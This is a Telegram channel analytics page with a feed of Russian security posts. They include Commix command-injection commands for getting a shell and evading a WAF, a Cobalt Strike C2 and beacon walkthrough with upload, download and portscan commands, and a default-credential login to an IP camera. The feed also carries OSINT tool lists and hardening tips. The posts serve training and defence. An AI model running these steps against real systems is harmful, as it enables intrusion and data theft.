CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام CodeGuard: CyberSec Edition
تُعد قناة CodeGuard: CyberSec Edition لاعباً نشطاً. يضم المجتمع حالياً 12 511 مشتركاً، محتلاً المرتبة 10 168 في فئة التكنولوجيات والتطبيقات والمرتبة 52 930 في منطقة روسيا.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 12 511 مشتركاً.
بحسب آخر البيانات بتاريخ 19 يونيو, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 493، وفي آخر 24 ساعة بمقدار 23، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 11.98%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً 6.31% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 1 495 مشاهدة. وخلال اليوم الأول يجمع عادةً 787 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 3.
- الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل codeguard, pysec, docker, grep, контейнер.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 20 يونيو, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
Для успешного прохождения курса требуются общие знания в области веб-технологий: что из себя представляет язык гипертекстовой разметки, как реализуется клиент-серверное взаимодействие, что такое tcp/ip.👩💻 Проходим курс здесь 😈 CyberSec Edition | Чат
# 1. Базовый скан GET-параметра
commix -u "http://target.com/ping.php?ip=127.0.0.1" --batch
# 2. Проверка POST-запроса
commix -u "http://target.com/ping.php" --data="ip=127.0.0.1" --batch
# 3. Указываем конкретный параметр
commix -u "http://target.com/ping.php?ip=127.0.0.1" -p ip
# 4. Выполнение команды
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-cmd="whoami"
# 5. Получаем pseudo-shell
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-shell
3️⃣ Выводы Commix в реале
[INFO] OS Command Injection vulnerability detected [INFO] Payload: ;id; [INFO] Current user: www-data [INFO] Operating system: Linux4️⃣ Продвинутые фишки
# Blind / Time-based injection
commix -u URL --technique=t --time-sec=5
# Обход WAF
commix -u URL --tamper=space2ifs,backticks
# User-Agent spoofing
commix -u URL --random-agent
# Прокси / TOR
commix -u URL --proxy=socks5://127.0.0.1:9050
🧠 Где тренироваться:
DVWA, bWAPP, Metasploitable2, Hack The Box (old-school boxes)
Полезно?
❤️ — Да
👍 — Нет
😈 CyberSec Edition | ЧатПолучил доступ к системам Пентагона и другим сетям Минобороны США, перехватывал трафик и данные, кейс считается первым публично признанным взломом Пентагона.2001–2002 — «безработный из Лондона» (дело Гари Маккиннона).
Несколько раз проникал в сети армии, флота, NASA и Минобороны, получал права администратора, удалял файлы и ставил удалённый доступ RemotelyAnywhere; пострадало около сотни военных и космических машин.2008 — заражённая флешка на базе США.
В ноутбук армии США на Ближнем Востоке вставили флешку с вредоносом, тот распространился по обычным и секретным сетям Пентагона — это назвали «крупнейшим взломом сети Пентагона» на тот момент и пересмотрели стратегию киберзащиты.2015 — компрометация почтовой системы военного командования.
Экс‑глава объединённого комитета начальников штабов США заявлял, что «российские хакеры» взломали электронную почту структур Пентагона в августе 2015 года.Параллельно — многолетние утечки и атаки на смежные системы.
Похищение данных о F‑35, кража 24 тыс. секретных файлов в 2011 году, взломы NASA, армейских и ведомственных сетей — всё это не всегда формально именуют «взломом Пентагона», но по факту бьют по инфраструктуре Минобороны США.«12 000+ взломов» — о чём на самом деле цифры К концу 2020 года Минобороны США зафиксировало более 12 тысяч найденных уязвимостей через платформы вроде HackerOne — это запуски контролируемых тестов и баг‑баунти, а не «успешные атаки врага». Участники находили баги во внешних системах, веб‑сервисах и инфраструктуре Пентагона, получая от 100 до 15 000 долларов за каждую критичную уязвимость, в отдельных конкурсах за считанные минуты успев обнаружить сотни проблем. То есть формально «взломы» там происходят десятки тысяч раз, но большая часть — легальные, согласованные проникновения ради укрепления защиты, а не шпионские операции. 😈 CodeGuard | Chat
▶️ Brute-force - перебор стандартных паролей (admin, 12345, пустой). ▶️ Поиск уязвимостей в веб-интерфейсе - старые версии ПО, injection-дыры. ▶️ Шпионские облачные сервисы - доступ к данным через 'левые' китайские платформы. ▶️ Ботнеты (вроде Mirai) - заражают устройства для DDoS-атак.Демонстрация (для исследования!):
# Пример запроса к уязвимой камере (изменённый)
curl -X POST "http://192.168.1.1/login.cgi" \
-d "username=admin&password=admin"
# Ответ: 'OK' и сессионная кука.
# Далее доступ к live-стриму: rtsp://admin:@192.168.1.1:554/stream1
Кто виноват?
- Производители, которые пашут на удешевление. - Пользователи, которые не меняют пароли. - Исходники прошивок, полные говна.Что делать?
▶️ Менять пароль по умолчанию. ▶️ Отключать UPnP и WPS. ▶️ Выпиливать камеру из публичного интернета (без проброса портов). ▶️ Ставить обновления, если они вообще есть.Shodan - поисковик дыр 😈 CodeGuard | Chat
🔵HTTP/HTTPS Beacon: Наиболее распространён. Имитирует легитимный веб-трафик, общается с сервером команды и управления (C2) через HTTP-запросы. 🔵DNS Beacon: Использует DNS-запросы для скрытого канала связи, часто обходит простые веб-фильтры. 🔵SMB Beacon: Коммуницирует через именованные каналы (named pipes), что полезно для внутреннего перемещения в доменной среде. Payload-ы: Эксплойты для доставки Beacon, такие как исполняемые файлы (exe), документы Office с макросами или скрипты PowerShell.Базовый сценарий: Развёртывание HTTPS Beacon Представьте, что вы специалист по безопасности (пентестер) и после фишинга получили доступ к рабочей станции в целевой сети. Теперь нужно установить стабильный канал управления. 1️⃣ Настройка Team Server (C2) Cobalt Strike разворачивается на сервере атакующего (Team Server), который принимает подключения от Beacon.
# Запуск Team Server (на сервере атакующего) ./teamserver [VPS_IP] [Shared_Password] [Profile_File]2️⃣ Создание Payload и запуск Beacon В клиенте Cobalt Strike создаётся вредоносный пакет (payload) для целевой системы.
# Генерация исполняемого файла (exe) с HTTPS Beacon Attacks → Packages → Windows Executable (S) Выбор Listener: HTTPS, указание домена C2 и порта.После доставки payload на цель (например, через фишинг) и его выполнения, на Team Server приходит "callback" от Beacon. 3️⃣ Взаимодействие и управление В клиенте появится новая сессия. Теперь можно выполнять команды, загружать модули, перемещаться по сети. Пример базовых команд в Beacon:
shell whoami # Выполнить системную команду upload /tmp/tool.exe # Загрузить файл на цель download secret.txt # Скачать файл с цели portscan 10.10.0.0/24 445 # Просканировать сеть на порт 445Результат (пример):
Beacon established to WORKSTATION-01\jdoe (High Integrity)Вывод: Beacon успешно внедрён в целевую систему под учётной записью пользователя с высоким уровнем привилегий. Это точка опоры для дальнейшей атаки. Как это работает изнутри:
🔵Malleable C2 Profile: Конфигурационный файл, который маскирует трафик Beacon под легитимные сервисы (например, под запросы к Google или Microsoft). 🔵Стадия (Staging): Малый начальный payload (stager) загружает основной payload (Beacon) в память, часто минуя диск. 🔵Сон (Sleep) и Jitter: Beacon не активен постоянно. Он "спит" заданные интервалы и добавляет случайную задержку (jitter), чтобы усложнить обнаружение.Защита: Как обнаружить и противостоять?
🔴Мониторинг сетевого трафика. Ищите аномальные DNS-запросы, регулярные HTTPS-соединения на нестандартные порты и несоответствие трафика заявленным User-Agent. 🔴Анализ процессов в памяти. Инструменты вроде EDR (Endpoint Detection and Response) могут обнаруживать инъекции кода и подозрительные действия PowerShell. 🔴Регулярное обучение пользователей для предотвращения успешных фишинговых атак - первоначального вектора доставки. 🔴Строгое сегментирование сети и применение принципа минимальных привилегий (Least Privilege) для ограничения перемещения атакующего.😈 CodeGuard | Chat
➡️ Блокировка внешнего доступа к порту кэша (11211) ➡️ Разрешение доступа только с localhost или определенных внутренних IP ➡️ Защита от случайного "открытия" сервиса в сеть ➡️ Простая и понятная конфигурация правил⚡️ Быстрая настройка связки: 1️⃣ Установка Memcached и ufw:
sudo apt update
sudo apt install memcached ufw
2️⃣ Базовая конфигурация Memcached (ограничение на localhost):
sudo nano /etc/memcached.conf
# Найти строку с `-l 127.0.0.1` и убедиться, что она раскомментирована
sudo systemctl restart memcached
3️⃣ Настройка ufw для полной блокировки внешнего доступа:
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh
sudo ufw allow from 127.0.0.1 to any port 11211
sudo ufw enable
sudo ufw status verbose
💡 Для более сложных сценариев (например, доступ с другого сервиса в приватной подсети) можно настроить правило точнее, например:
sudo ufw allow from 192.168.1.0/24 to any port 11211
🚀 Официальный сайт Memcached
😈 CodeGuard | Chat1) Maltego — мощный инструмент для визуализации связей между людьми, доменами и организациями. 2) theHarvester — поиск e-mail, доменов и IP через публичные источники. 3) SpiderFoot — автоматический фреймворк OSINT для поиска по более чем 100 источникам. 4) Recon-ng — модульный инструмент для сбора информации через API-сервисы. 5) Shodan — "поисковик хакеров", индексирует IoT, камеры, серверы. 6) Censys — глобальный поиск по онлайн-устройствам и сертификатам SSL. 7) Amass — автоматический сбор поддоменов и сетевых связей. 8) FOCA — извлечение метаданных из документов и изображений. 9) ExifTool — анализ и извлечение метаданных из файлов и фото. 10) Creepy — геолокация пользователей по фото и соцсетям. 11) GHunt — исследование Google-аккаунтов по публичным данным. 12) Sherlock — поиск аккаунтов по имени пользователя на сотнях сайтов. 13) Holehe — проверка, на каких сервисах зареган email. 14) Social-Analyzer — анализ профилей человека по соцсетям и онлайн-сервисам. 15) Metagoofil — извлечение документов из домена и анализ их метаданных. 16) DNSDumpster — интерактивный поиск DNS-записей и поддоменов. 17) Wayback Machine — просмотр старых версий сайтов и утечек страниц. 18) WhoisXML API — WHOIS и IP-аналитика для доменов и инфраструктуры. 19) IntelX — поиск утечек, ключей API и паролей из открытых источников. 20) ReconDog — легкий и гибкий инструмент для первичного сбора данных.Этот OSINT-набор помогает работать "в белую": исследовать следы, находить инсайты и выстраивать аналитическую картину события. Будь орлом, поставь 👍 😈 CodeGuard | Chat
▶️ Формат JSON без аллокаций и отражений (reflection-free). ▶️ Поддержка уровней логирования (debug, info, warn, error, fatal, panic). ▶️ Встроенные timestamp’ы, stack trace и caller info. ▶️ Простая интеграция с context.Context для tracing’а. ▶️ Поддержка chainable API — декларативный стиль. ▶️ Совместимость с OpenTelemetry и структурными парсерами.⚡️ Быстрый старт с Zerolog: Установка:
go get github.com/rs/zerolog/log
Использование:
package main
import "github.com/rs/zerolog/log"
func main() {
log.Info().Str("service", "auth").Msg("Server started")
}
🟢Подходит для микросервисов, CLI и облачных приложений. 🟢Совместим с Docker, Kubernetes и Serverless инфраструктурой. 🟢Простое масштабирование логов через JSON pipeline.💻 Репозиторий GitHub 😈 CodeGuard: PySec Edition | Чат
🔴делать скриншоты веб-страниц и веб-приложений; 🔴собирать метаданные: заголовки, коды ответов, технологии (через Wappalyzer); 🔴распознавать формы входа, чтобы быстро находить уязвимые точки; 🔴генерировать удобный HTML-отчет, где всё разложено по полочкам.📖 Как использовать EyeWitness?
🔵Устанавливаем (проще через клонирование репозитория GitHub). 🔵Подготавливаем файл со списком целей (IP или домены). 🔵Запускаем командой: ./EyeWitness -f targets.txt --web 🔵Ждем, пока инструмент обойдет все цели и сделает свою работу. 🔵Открываем красочный HTML-отчет и анализируем результаты.💡EyeWitness превращает скучный список адресов в наглядную карту целей. Больше не нужно открывать каждый сайт вручную - за вас это сделает автоматический сыщик. 😈 CyberSec Edition | Чат
"Есть два вида компаний: те, что были взломаны, и те, что пока еще не знают, что были взломаны. А когда они по итогу узнают об этом - если им посчастливится - начинается отчаянная паника, которая быстро доходит до уровня руководства компании."В этой книге в подробностях описывается подобный инцидент, расследование основанное на реальных событиях, начиная с первого сомнительного звонка, сделанного банком, атаки, до пика максимальной напряженности, вызванного предварительным криминалистическим анализом. 💠 Качай книгу → [Archive] 😈 CodeGuard | Chat
P.S. Пока ты читаешь — кто-то другой уже прокачивается.
متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
